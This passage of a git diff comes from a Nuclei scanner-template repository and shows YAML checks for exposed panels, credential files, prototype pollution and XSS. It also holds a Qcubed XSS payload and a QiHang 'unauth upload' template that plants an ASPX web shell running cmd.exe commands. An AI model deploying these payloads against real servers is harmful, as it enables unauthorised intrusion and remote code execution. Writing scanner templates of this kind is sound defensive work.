high + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + words: + - If you need immediate assistance, please contact = 0 && loc.search("a0def12bce") == -1) { + setTimeout(function() { + if (Object.prototype.e32a5ec9c99 == "ddcb362f1d60") { + logger(location.href); + } + var url = new URL(location.origin + location.pathname); + url.hash = "__proto__[a0def12bce]=ddcb362f1d60&__proto__.a0def12bce=ddcb362f1d60&dummy"; + location = url.href; + }, 5 * 1000); + } else if (loc.search("a0def12bce") != -1) { + setTimeout(function() { + if (Object.prototype.a0def12bce == "ddcb362f1d60") { + logger(location.href); + } + window.close(); + }, 5 * 1000); + } else { + var url = new URL(loc); + url.searchParams.append("__proto__[e32a5ec9c99]", "ddcb362f1d60"); + url.searchParams.append("__proto__.e32a5ec9c99", "ddcb362f1d60"); + location = url.href; + } + } + + window.onload = function() { + if (Object.prototype.e32a5ec9c99 == "ddcb362f1d60" || Object.prototype.a0def12bce == "ddcb362f1d60") { + logger(location.href); + } else { + check(); + } + }; + + var timerID = setInterval(function() { + if (Object.prototype.e32a5ec9c99 == "ddcb362f1d60" || Object.prototype.a0def12bce == "ddcb362f1d60") { + logger(location.href); + clearInterval(timerID); + } + }, 5 * 1000)})(); + - args: + url: "{{BaseURL}}" + action: navigate + - action: waitload + - action: script + name: alerts + args: + code: "window.alerts" + matchers: + - type: word + part: alerts + words: + - "__proto__" + extractors: + - type: kval + part: alerts + kval: + - alerts diff --git a/nuclei-templates/Other/prototype-pollution-check-9699.yaml b/nuclei-templates/Other/prototype-pollution-check-9699.yaml deleted file mode 100644 index d66d5961ba..0000000000 --- a/nuclei-templates/Other/prototype-pollution-check-9699.yaml +++ /dev/null @@ -1,94 +0,0 @@ -id: prototype-pollution-check -info: - name: Prototype Pollution Check - author: pdteam - severity: medium - reference: https://github.com/msrkp/PPScan - tags: headless -headless: - - steps: - - action: setheader - args: - part: response - key: Content-Security-Policy - value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;" - - action: setheader - args: - part: response - key: X-Frame-Options - value: foo - - action: setheader - args: - part: response - key: If-None-Match - value: foo - - action: script - args: - hook: true - code: | - // Hooking code adapted from https://github.com/msrkp/PPScan/blob/main/scripts/content_script.js - (function() {window.alerts = []; - - function logger(found) { - window.alerts.push(found); - } - - function check() { - loc = location.href; - - if (loc.indexOf("e32a5ec9c99") >= 0 && loc.search("a0def12bce") == -1) { - setTimeout(function() { - if (Object.prototype.e32a5ec9c99 == "ddcb362f1d60") { - logger(location.href); - } - var url = new URL(location.origin + location.pathname); - url.hash = "__proto__[a0def12bce]=ddcb362f1d60&__proto__.a0def12bce=ddcb362f1d60&dummy"; - location = url.href; - }, 5 * 1000); - } else if (loc.search("a0def12bce") != -1) { - setTimeout(function() { - if (Object.prototype.a0def12bce == "ddcb362f1d60") { - logger(location.href); - } - window.close(); - }, 5 * 1000); - } else { - var url = new URL(loc); - url.searchParams.append("__proto__[e32a5ec9c99]", "ddcb362f1d60"); - url.searchParams.append("__proto__.e32a5ec9c99", "ddcb362f1d60"); - location = url.href; - } - } - - window.onload = function() { - if (Object.prototype.e32a5ec9c99 == "ddcb362f1d60" || Object.prototype.a0def12bce == "ddcb362f1d60") { - logger(location.href); - } else { - check(); - } - }; - - var timerID = setInterval(function() { - if (Object.prototype.e32a5ec9c99 == "ddcb362f1d60" || Object.prototype.a0def12bce == "ddcb362f1d60") { - logger(location.href); - clearInterval(timerID); - } - }, 5 * 1000)})(); - - args: - url: "{{BaseURL}}" - action: navigate - - action: waitload - - action: script - name: alerts - args: - code: "window.alerts" - matchers: - - type: word - part: alerts - words: - - "__proto__" - extractors: - - type: kval - part: alerts - kval: - - alerts diff --git a/nuclei-templates/Other/provider-path-9701.yaml b/nuclei-templates/Other/provider-path-9702.yaml similarity index 100% rename from nuclei-templates/Other/provider-path-9701.yaml rename to nuclei-templates/Other/provider-path-9702.yaml diff --git a/nuclei-templates/Other/prtg-detect-9704.yaml b/nuclei-templates/Other/prtg-detect-9705.yaml similarity index 100% rename from nuclei-templates/Other/prtg-detect-9704.yaml rename to nuclei-templates/Other/prtg-detect-9705.yaml diff --git a/nuclei-templates/Other/psmessage.yaml b/nuclei-templates/Other/psmessage.yaml deleted file mode 100644 index 8150161f44..0000000000 --- a/nuclei-templates/Other/psmessage.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: addeventlistener-detect - -info: - name: DOM EventListener detection - author: yavolo,dwisiswant0 - severity: info - reference: - - https://portswigger.net/web-security/dom-based/controlling-the-web-message-source - tags: xss,misc - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: regex - part: body - regex: - - (([\w\_]+)\.)?add[Ee]vent[Ll]istener\(["']?[\w\_]+["']? # Test cases: https://www.regextester.com/?fam=121118 diff --git a/nuclei-templates/Other/ptr-fingerprint-9707.yaml b/nuclei-templates/Other/ptr-fingerprint-9707.yaml new file mode 100644 index 0000000000..9961947050 --- /dev/null +++ b/nuclei-templates/Other/ptr-fingerprint-9707.yaml @@ -0,0 +1,22 @@ +id: ptr-fingerprint + +info: + name: PTR Fingerprint + author: pdteam + severity: info + tags: dns,ptr + +dns: + - name: "{{FQDN}}" + type: PTR + + matchers: + - type: word + words: + - "IN\tPTR" + + extractors: + - type: regex + group: 1 + regex: + - "IN\tPTR\t(.+)" \ No newline at end of file diff --git a/nuclei-templates/Other/ptr-fingerprint.yaml b/nuclei-templates/Other/ptr-fingerprint.yaml deleted file mode 100644 index beafddd77d..0000000000 --- a/nuclei-templates/Other/ptr-fingerprint.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: ptr-fingerprint -info: - name: PTR Detected - author: pdteam - severity: info - description: A PTR record was detected. A PTR record refers to the domain name. - classification: - cwe-id: CWE-200 - tags: dns,ptr -dns: - - name: "{{FQDN}}" - type: PTR - matchers: - - type: word - words: - - "IN\tPTR" - extractors: - - type: regex - group: 1 - regex: - - "IN\tPTR\t(.+)" - -# Enhanced by mp on 2022/03/14 diff --git a/nuclei-templates/Other/public-tomcat-manager-9711.yaml b/nuclei-templates/Other/public-tomcat-manager.yaml similarity index 100% rename from nuclei-templates/Other/public-tomcat-manager-9711.yaml rename to nuclei-templates/Other/public-tomcat-manager.yaml diff --git a/nuclei-templates/Other/pulse-secure-panel-9712.yaml b/nuclei-templates/Other/pulse-secure-panel-9712.yaml new file mode 100644 index 0000000000..8b5229e6cb --- /dev/null +++ b/nuclei-templates/Other/pulse-secure-panel-9712.yaml @@ -0,0 +1,27 @@ +id: pulse-secure-panel + +info: + name: Pulse Secure VPN Panel + author: bsysop + severity: info + tags: panel,pulse,vpn + +requests: + - method: GET + path: + - "{{BaseURL}}/dana-na/auth/url_default/welcome.cgi" + - "{{BaseURL}}/dana-na/auth/url_2/welcome.cgi" + - "{{BaseURL}}/dana-na/auth/url_3/welcome.cgi" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: header + words: + - "/dana-na/auth/welcome.cgi" + + - type: regex + part: body + regex: + - "(?i)/dana-na/css/ds(_[a-f0-9]{64})?.css" \ No newline at end of file diff --git a/nuclei-templates/Other/pulse-secure-panel.yaml b/nuclei-templates/Other/pulse-secure-panel.yaml deleted file mode 100644 index 55cb67a8e2..0000000000 --- a/nuclei-templates/Other/pulse-secure-panel.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: pulse-secure-panel -info: - name: Pulse Secure VPN Panel - author: bsysop - severity: info - tags: panel,pulse,vpn -requests: - - method: GET - path: - - "{{BaseURL}}/dana-na/auth/url_default/welcome.cgi" - - "{{BaseURL}}/dana-na/auth/url_2/welcome.cgi" - - "{{BaseURL}}/dana-na/auth/url_3/welcome.cgi" - stop-at-first-match: true - matchers-condition: or - matchers: - - type: word - part: header - words: - - "/dana-na/auth/welcome.cgi" - - type: regex - part: body - regex: - - "(?i)/dana-na/css/ds(_[a-f0-9]{64})?.css" diff --git a/nuclei-templates/Other/puppet-node-manager-detect-9720.yaml b/nuclei-templates/Other/puppet-node-manager-detect-9720.yaml new file mode 100644 index 0000000000..24d0ce4789 --- /dev/null +++ b/nuclei-templates/Other/puppet-node-manager-detect-9720.yaml @@ -0,0 +1,24 @@ +id: puppet-node-manager-detect + +info: + name: Puppet Node Manager + author: pussycat0x + severity: info + metadata: + fofa-dork: 'app="puppet-Node-Manager"' + tags: node,tech + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - 'Puppet Node Manager' + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/puppet-node-manager-detect.yaml b/nuclei-templates/Other/puppet-node-manager-detect.yaml deleted file mode 100644 index a7dea10e27..0000000000 --- a/nuclei-templates/Other/puppet-node-manager-detect.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: puppet-node-manager-detect -info: - name: Puppet Node Manager - author: pussycat0x - severity: info - metadata: - fofa-dork: 'app="puppet-Node-Manager"' - tags: node,tech -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: word - words: - - 'Puppet Node Manager' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/puppetdb-detect-9717.yaml b/nuclei-templates/Other/puppetdb-detect-9717.yaml new file mode 100644 index 0000000000..73c4e2f59c --- /dev/null +++ b/nuclei-templates/Other/puppetdb-detect-9717.yaml @@ -0,0 +1,26 @@ +id: puppetdb-detect +info: + name: PuppetDB detection + author: c-sh0 + reference: + - https://puppet.com/docs/puppetdb/7/api/meta/v1/version.html#pdbmetav1version + severity: info + description: PuppetDB detection + tags: puppet,tech,exposure +requests: + - method: GET + path: + - "{{BaseURL}}/pdb/meta/v1/version" + matchers: + - type: status + status: + - 200 + - type: word + part: header + words: + - 'application/json' + extractors: + - type: regex + group: 1 + regex: + - '"version"\s:\s"([0-9.]+)"' diff --git a/nuclei-templates/Other/puppetdb-detect-9718.yaml b/nuclei-templates/Other/puppetdb-detect-9718.yaml deleted file mode 100644 index 7b29c8def5..0000000000 --- a/nuclei-templates/Other/puppetdb-detect-9718.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: puppetdb-detect -info: - name: PuppetDB Detection - author: c-sh0 - severity: info - reference: https://puppet.com/docs/puppetdb/7/api/meta/v1/version.html#pdbmetav1version - tags: puppet,tech,exposure -requests: - - method: GET - path: - - "{{BaseURL}}/pdb/meta/v1/version" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - part: header - words: - - 'application/json' - - type: word - part: body - words: - - '"version"' - extractors: - - type: regex - group: 1 - regex: - - '"version"\s:\s"([0-9.]+)"' diff --git a/nuclei-templates/Other/puppetserver-detect-9722.yaml b/nuclei-templates/Other/puppetserver-detect-9722.yaml new file mode 100644 index 0000000000..8b9e32851b --- /dev/null +++ b/nuclei-templates/Other/puppetserver-detect-9722.yaml @@ -0,0 +1,29 @@ +id: puppetserver-detect +info: + name: Puppetserver Detection + author: c-sh0 + severity: info + reference: https://insinuator.net/2020/09/puppet-assessment-techniques/ + tags: tech,puppet,exposure +requests: + - method: GET + path: + - "{{BaseURL}}/puppet-ca/v1/certificate_request/{{randstr}}" + matchers-condition: and + matchers: + - type: status + status: + - 404 + - type: word + part: header + words: + - "x-puppet-version" + case-insensitive: true + - type: word + part: body + words: + - "{{randstr}}" + extractors: + - type: kval + kval: + - x_puppet_version diff --git a/nuclei-templates/Other/puppetserver-detect-9723.yaml b/nuclei-templates/Other/puppetserver-detect-9723.yaml deleted file mode 100644 index 83c9bcabdf..0000000000 --- a/nuclei-templates/Other/puppetserver-detect-9723.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: puppetserver-detect - -info: - name: Puppetserver Detection - author: c-sh0 - severity: info - reference: - - https://insinuator.net/2020/09/puppet-assessment-techniques/ - metadata: - max-request: 1 - tags: tech,puppet,exposure,intrusive - -http: - - method: GET - path: - - "{{BaseURL}}/puppet-ca/v1/certificate_request/{{randstr}}" - - matchers-condition: and - matchers: - - type: status - status: - - 404 - - - type: word - part: header - words: - - "x-puppet-version" - case-insensitive: true - - - type: word - part: body - words: - - "{{randstr}}" - - extractors: - - type: kval - kval: - - x_puppet_version - -# digest: 4b0a004830460221009da8fdf7d343803bb76c86b36935e485784f03258b9285ef838fe1bddacf115e02210080939b191b4e6ebd534a1d86ad859bd1cf566f2493f8bf5aa4c26768786edf80:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/pure-storage-login-9724.yaml b/nuclei-templates/Other/pure-storage-login-9724.yaml new file mode 100644 index 0000000000..e68bb8d17a --- /dev/null +++ b/nuclei-templates/Other/pure-storage-login-9724.yaml @@ -0,0 +1,24 @@ +id: pure-storage-login + +info: + name: Pure Storage Login + author: dhiyaneshDK + severity: info + metadata: + shodan-query: 'http.title:"Pure Storage Login"' + tags: panel,purestorage + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Pure Storage Login' + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/pure-storage-login.yaml b/nuclei-templates/Other/pure-storage-login.yaml deleted file mode 100644 index ff24e5c6a3..0000000000 --- a/nuclei-templates/Other/pure-storage-login.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: pure-storage-login -info: - name: Pure Storage Login - author: dhiyaneshDK - severity: info - metadata: - shodan-query: 'http.title:"Pure Storage Login"' - tags: panel,purestorage -requests: - - method: GET - path: - - '{{BaseURL}}' - matchers-condition: and - matchers: - - type: word - words: - - 'Pure Storage Login' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/put-method-enabled-9727.yaml b/nuclei-templates/Other/put-method-enabled-9727.yaml new file mode 100644 index 0000000000..9fbf7ae3d3 --- /dev/null +++ b/nuclei-templates/Other/put-method-enabled-9727.yaml @@ -0,0 +1,28 @@ +id: put-method-enabled +info: + name: PUT Method Enabled + author: xElkomy + severity: high + description: The HTTP PUT method is normally used to upload data that is saved on the server at a user-supplied URL. If enabled, an attacker may be able to place arbitrary, and potentially malicious, content into the application. Depending on the server's configuration, this may lead to compromise of other users (by uploading client-executable scripts), compromise of the server (by uploading server-executable code), or other attacks. + reference: + - https://portswigger.net/kb/issues/00100900_http-put-method-is-enabled + tags: injection +requests: + - raw: + - | + PUT /testing-put.txt HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/plain + + {{randstr}} + - | + GET /testing-put.txt HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/plain + req-condition: true + matchers: + - type: dsl + dsl: + - 'contains(body_2, "{{randstr}}")' + +# Enhanced by mp on 2022/04/20 diff --git a/nuclei-templates/Other/put-method-enabled.yaml b/nuclei-templates/Other/put-method-enabled.yaml deleted file mode 100644 index 01a3795506..0000000000 --- a/nuclei-templates/Other/put-method-enabled.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: put-method-enabled -info: - name: PUT method enabled - author: xElkomy - severity: high - reference: https://portswigger.net/kb/issues/00100900_http-put-method-is-enabled - tags: injection -requests: - - raw: - - | - PUT /testing-put.txt HTTP/1.1 - Content-Type: text/plain - - {{randstr}} - - | - GET /testing-put.txt HTTP/1.1 - Content-Type: text/plain - req-condition: true - matchers: - - type: dsl - dsl: - - 'contains(body_2, "{{randstr}}")' diff --git a/nuclei-templates/Other/putty-private-key-disclosure-9731.yaml b/nuclei-templates/Other/putty-private-key-disclosure-9731.yaml new file mode 100644 index 0000000000..1dc255d138 --- /dev/null +++ b/nuclei-templates/Other/putty-private-key-disclosure-9731.yaml @@ -0,0 +1,26 @@ +id: putty-private-key-disclosure + +info: + name: Putty Private Key Disclosure + author: dhiyaneshDk + severity: medium + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/putty-private-key-disclosure.json + tags: exposure,files + +requests: + - method: GET + path: + - "{{BaseURL}}/my.ppk" + + matchers-condition: and + matchers: + - type: word + words: + - "PuTTY-User-Key-File" + - "Encryption:" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/putty-private-key-disclosure.yaml b/nuclei-templates/Other/putty-private-key-disclosure.yaml deleted file mode 100644 index bdb1c932e8..0000000000 --- a/nuclei-templates/Other/putty-private-key-disclosure.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: putty-private-key-disclosure -info: - name: Putty Private Key Disclosure - author: dhiyaneshDk - severity: medium - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/putty-private-key-disclosure.json - tags: exposure,files -requests: - - method: GET - path: - - "{{BaseURL}}/my.ppk" - matchers-condition: and - matchers: - - type: word - words: - - "PuTTY-User-Key-File" - - "Encryption:" - part: body - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/pypicloud-panel-9733.yaml b/nuclei-templates/Other/pypicloud-panel-9733.yaml new file mode 100644 index 0000000000..984e2eeabd --- /dev/null +++ b/nuclei-templates/Other/pypicloud-panel-9733.yaml @@ -0,0 +1,25 @@ +id: pypicloud-panel +info: + name: Pypicloud panel detection + author: Supras + severity: info + reference: + - https://pypicloud.readthedocs.io/en/latest/ + metadata: + google-query: intext:pypicloud + tags: panel,pypicloud +requests: + - method: GET + path: + - '{{BaseURL}}/login' + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Pypicloud' + - '' + condition: or + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/pypicloud-panel.yaml b/nuclei-templates/Other/pypicloud-panel.yaml deleted file mode 100644 index ed93546114..0000000000 --- a/nuclei-templates/Other/pypicloud-panel.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: pypicloud-panel - -info: - name: Pypicloud panel detection - author: Supras - severity: info - reference: https://pypicloud.readthedocs.io/en/latest/ - metadata: - google-query: 'intext:pypicloud' - tags: panel,pypicloud - -requests: - - method: GET - path: - - '{{BaseURL}}/login' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Pypicloud' - - '' - condition: or - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/pyproject-disclosure.yaml b/nuclei-templates/Other/pyproject-disclosure-9736.yaml similarity index 100% rename from nuclei-templates/Other/pyproject-disclosure.yaml rename to nuclei-templates/Other/pyproject-disclosure-9736.yaml diff --git a/nuclei-templates/Other/python-app-sql-exceptions-9744.yaml b/nuclei-templates/Other/python-app-sql-exceptions-9744.yaml new file mode 100644 index 0000000000..b4529f7cfc --- /dev/null +++ b/nuclei-templates/Other/python-app-sql-exceptions-9744.yaml @@ -0,0 +1,23 @@ +id: python-app-sql-exceptions + +info: + name: Python App SQL Exception Check + description: Generic check for SQL exceptions in Python according to PEP 249 + reference: https://www.python.org/dev + author: geeknik + severity: medium + tags: file,logs,python,sql + +file: + - extensions: + - all + + extractors: + - type: regex + name: exception + part: body + regex: + - 'DataError' + - 'IntegrityError' + - 'ProgrammingError' + - 'OperationalError' diff --git a/nuclei-templates/Other/python-app-sql-exceptions.yaml b/nuclei-templates/Other/python-app-sql-exceptions.yaml deleted file mode 100644 index cf31580c01..0000000000 --- a/nuclei-templates/Other/python-app-sql-exceptions.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: python-app-sql-exceptions -info: - name: Python App SQL Exception Check - description: Generic check for SQL exceptions in Python according to PEP 249 - reference: https://www.python.org/dev - author: geeknik - severity: medium - tags: file,logs,python,sql -file: - - extensions: - - all - extractors: - - type: regex - name: exception - part: body - regex: - - 'DataError' - - 'IntegrityError' - - 'ProgrammingError' - - 'OperationalError' diff --git a/nuclei-templates/Other/python-metrics-9745.yaml b/nuclei-templates/Other/python-metrics-9745.yaml new file mode 100644 index 0000000000..0d03d3cfff --- /dev/null +++ b/nuclei-templates/Other/python-metrics-9745.yaml @@ -0,0 +1,29 @@ +id: python-metrics + +info: + name: Detect Python Exposed Metrics + author: dhiyaneshDK + severity: low + description: Information Disclosure of Garbage Collection + tags: exposure,devops,python + reference: + - https://www.shodan.io/search?query=html%3A%22python_gc_objects_collected_total%22 + - https://gist.github.com/ruanbekker/e5b1e7895f62b020ff29b5f40767190c + +requests: + - method: GET + path: + - "{{BaseURL}}/metrics" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "python_gc_objects_collected_total" + - "python_info" + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/python-metrics-9747.yaml b/nuclei-templates/Other/python-metrics-9747.yaml deleted file mode 100644 index 6f69f8e072..0000000000 --- a/nuclei-templates/Other/python-metrics-9747.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: python-metrics -info: - name: Detect Python Exposed Metrics - author: dhiyaneshDK - severity: low - description: Information Disclosure of Garbage Collection - tags: exposure,devops,python - reference: - - https://www.shodan.io/search?query=html%3A%22python_gc_objects_collected_total%22 - - https://gist.github.com/ruanbekker/e5b1e7895f62b020ff29b5f40767190c -requests: - - method: GET - path: - - "{{BaseURL}}/metrics" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "python_gc_objects_collected_total" - - "python_info" - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/qcubed-xss-9749.yaml b/nuclei-templates/Other/qcubed-xss-9749.yaml new file mode 100644 index 0000000000..420879092a --- /dev/null +++ b/nuclei-templates/Other/qcubed-xss-9749.yaml @@ -0,0 +1,32 @@ +id: qcubed-xss + +info: + name: Qcubed Reflected XSS + author: pikpikcu + severity: medium + description: A vulnerability in Qcubed allows remote attackers to inject arbitrary Javascript via the '/assets/php/_devtools/installer/step_2.php' endpoint and the 'installation_path' parameter. + reference: https://github.com/qcubed/qcubed/issues/1230 + tags: xss,qcubed + +requests: + - method: GET + path: + - "{{BaseURL}}/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + - "{{BaseURL}}/qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html diff --git a/nuclei-templates/Other/qcubed-xss.yaml b/nuclei-templates/Other/qcubed-xss.yaml deleted file mode 100644 index c3cee1042e..0000000000 --- a/nuclei-templates/Other/qcubed-xss.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: qcubed-xss -info: - name: Qcubed Reflected XSS - author: pikpikcu - severity: medium - description: A vulnerability in Qcubed allows remote attackers to inject arbitrary Javascript via the '/assets/php/_devtools/installer/step_2.php' endpoint and the 'installation_path' parameter. - reference: https://github.com/qcubed/qcubed/issues/1230 - tags: xss,qcubed -requests: - - method: GET - path: - - "{{BaseURL}}/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - "{{BaseURL}}/qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - type: status - status: - - 200 - - type: word - part: header - words: - - text/html diff --git a/nuclei-templates/Other/qdpm-info-leak-9754.yaml b/nuclei-templates/Other/qdpm-info-leak-9754.yaml deleted file mode 100644 index 923f40f980..0000000000 --- a/nuclei-templates/Other/qdpm-info-leak-9754.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: qdpm-info-leak - -info: - author: gy741 - description: The password and connection string for the database are stored in a yml file. To access the yml file you can go to http:///core/config/databases.yml file and download. - name: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated) - severity: high - tags: qdpm,exposure - reference: - - https://www.exploit-db.com/exploits/50176 - -requests: - - method: GET - path: - - '{{BaseURL}}/core/config/databases.yml' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'dsn:' - - 'username:' - - 'password:' - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/qdpm-info-leak.yaml b/nuclei-templates/Other/qdpm-info-leak.yaml new file mode 100644 index 0000000000..756911e692 --- /dev/null +++ b/nuclei-templates/Other/qdpm-info-leak.yaml @@ -0,0 +1,25 @@ +id: qdpm-info-leak +info: + name: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated) + author: gy741 + severity: high + description: The password and connection string for the database are stored in a yml file. To access the yml file you can go to http:///core/config/databases.yml file and download. + reference: + - https://www.exploit-db.com/exploits/50176 + tags: qdpm,exposure +requests: + - method: GET + path: + - '{{BaseURL}}/core/config/databases.yml' + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'dsn:' + - 'username:' + - 'password:' + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/qi-anxin-netkang-next-generation-firewall-rce-9761.yaml b/nuclei-templates/Other/qi-anxin-netkang-next-generation-firewall-rce.yaml similarity index 100% rename from nuclei-templates/Other/qi-anxin-netkang-next-generation-firewall-rce-9761.yaml rename to nuclei-templates/Other/qi-anxin-netkang-next-generation-firewall-rce.yaml diff --git a/nuclei-templates/Other/qihang-media-disclosure-9764.yaml b/nuclei-templates/Other/qihang-media-disclosure-9764.yaml new file mode 100644 index 0000000000..4bc2973454 --- /dev/null +++ b/nuclei-templates/Other/qihang-media-disclosure-9764.yaml @@ -0,0 +1,23 @@ +id: qihang-media-disclosure + +info: + name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 - Cleartext Credentials Disclosure + author: gy741 + severity: critical + description: The application suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml and obtain administrative login information that allows for a successful authentication bypass attack. + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php + tags: qihang,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/xml/User/User.xml" + + matchers: + - type: word + words: + - "" + - "account=" + - "password=" + condition: and diff --git a/nuclei-templates/Other/qihang-media-disclosure.yaml b/nuclei-templates/Other/qihang-media-disclosure.yaml deleted file mode 100644 index 1cdbe2c7a0..0000000000 --- a/nuclei-templates/Other/qihang-media-disclosure.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: qihang-media-disclosure -info: - name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 - Cleartext Credentials Disclosure - author: gy741 - severity: critical - description: The application suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml and obtain administrative login information that allows for a successful authentication bypass attack. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php - tags: qihang,exposure -requests: - - method: GET - path: - - "{{BaseURL}}/xml/User/User.xml" - matchers: - - type: word - words: - - "" - - "account=" - - "password=" - condition: and diff --git a/nuclei-templates/Other/qihang-media-upload.yaml b/nuclei-templates/Other/qihang-media-upload.yaml new file mode 100644 index 0000000000..7dcc350b94 --- /dev/null +++ b/nuclei-templates/Other/qihang-media-upload.yaml @@ -0,0 +1,107 @@ +id: qihang-media-unauth-upload + +info: + name: QiHang Media Web Digital Signage 3.0.9 - unauth upload + author: vitasoy + severity: critical + description: | + body="/images/qihang.ico" && region="Guangdong" + --dork-zoomeye subdivisions:"广东" +qihang.ico + QiHang Media Web Digital Signage 3.0.9 suffers from a clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml and obtain administrative login information that allows for a successful authentication bypass attack. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + max-request: 1 + tags: qihang,upload,unauth,intrusive + +variables: + a1: "{{rand_base(6)}}" +http: + - raw: + - | + POST /QH.aspx HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5666.197 Safari/537.36 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryhbcZX7o0Hw19h3kr + Content-Length: 1830 + + ------WebKitFormBoundaryhbcZX7o0Hw19h3kr + Content-Disposition: form-data; name="fileToUpload"; filename="{{a1}}.aspx" + Content-Type: application/octet-stream + + <%@ Page Language="VB" Debug="true" %> + <%@ import Namespace="system.IO" %> + <%@ import Namespace="System.Diagnostics" %> + + + + + +
    +

    Program + c:\windows\system32\cmd.exe +

    Arguments + /c whoami&&ipconfig +

    +

    +

    + + + ------WebKitFormBoundaryhbcZX7o0Hw19h3kr + Content-Disposition: form-data; name="action" + + upload + ------WebKitFormBoundaryhbcZX7o0Hw19h3kr + Content-Disposition: form-data; name="responderId" + + ResourceNewResponder + ------WebKitFormBoundaryhbcZX7o0Hw19h3kr + Content-Disposition: form-data; name="remotePath" + + /opt/resources + ------WebKitFormBoundaryhbcZX7o0Hw19h3kr-- + - | + GET /opt/resources/{{a1}}.aspx HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5666.197 Safari/537.36 + + matchers-condition: and + matchers: + - type: word + words: + - "aspx" + part: body + + - type: word + words: + - "Program" + part: body + +# digest: 4a0a00473045022100b0ccc2410095cc0b8643fecc56332837abe16e738090fb425ade88ff74dc8ee202202fb2a4c5e13026904c35c4e5b1714a655b8b1d0a2836099f26d0923adcbac7cc:922c64590222798bb761d5b6d8e72950 +# \ No newline at end of file diff --git a/nuclei-templates/Other/qihang-media-upload_all.yaml b/nuclei-templates/Other/qihang-media-upload_all.yaml deleted file mode 100644 index 